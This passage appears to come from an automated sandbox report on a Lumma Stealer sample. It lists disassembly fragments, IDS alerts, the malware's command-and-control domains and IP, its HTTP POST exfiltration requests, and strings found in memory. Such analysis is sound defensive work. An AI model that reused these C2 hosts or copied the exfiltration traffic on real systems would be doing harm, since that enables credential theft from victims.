                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0248CB7E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_024A5BF7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, di0_2_024A5BF7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_0248ABA7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, ecx0_2_0248ABA7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_024AB75E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024AB75E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_02494806
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_024A0817
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_024B3897
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC8B1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC94B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_02489967
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_02489967
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_02489967
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02496907
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov eax, edx0_2_0249C921
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_024A89C0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_024BA9DE
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC98D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_024AC99C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_024B6E67
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02495F79
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024A1F77
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_02498F35
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_02498F35
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_024BCFC7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0248DF8C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_024BBC08
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_024A9C17
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0249EC17
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_024B6C3B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov esi, eax0_2_024A3C9B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then mov ecx, eax0_2_024BAD19
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_024BCD87

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.8:50102 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.8:60487 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.8:58380 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.8:55711 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.8:50775 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.8:63357 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.8:54158 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.8:61993 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49706 -> 23.55.153.106:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49709 -> 172.67.157.254:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: scentniej.buzz
                      Source: Malware configuration extractorURLs: inherineau.buzz
                      Source: Malware configuration extractorURLs: rebuildeso.buzz
                      Source: Malware configuration extractorURLs: screwamusresz.buzz
                      Source: Malware configuration extractorURLs: hummskitnj.buzz
                      Source: Malware configuration extractorURLs: cashfuzysao.buzz
                      Source: Malware configuration extractorURLs: appliacnesot.buzz
                      Source: Malware configuration extractorURLs: prisonyfork.buzz
                      Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 23.55.153.106:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.157.254:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: lev-tolstoi.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZHXDL6PTAB9YT3TQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12829Host: lev-tolstoi.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NMJDNFT3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15010Host: lev-tolstoi.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U5FRMBJPQ6LUHBEW3EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: lev-tolstoi.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                      Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                      Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                      Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                      Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                      Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                      Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                      Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fa
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
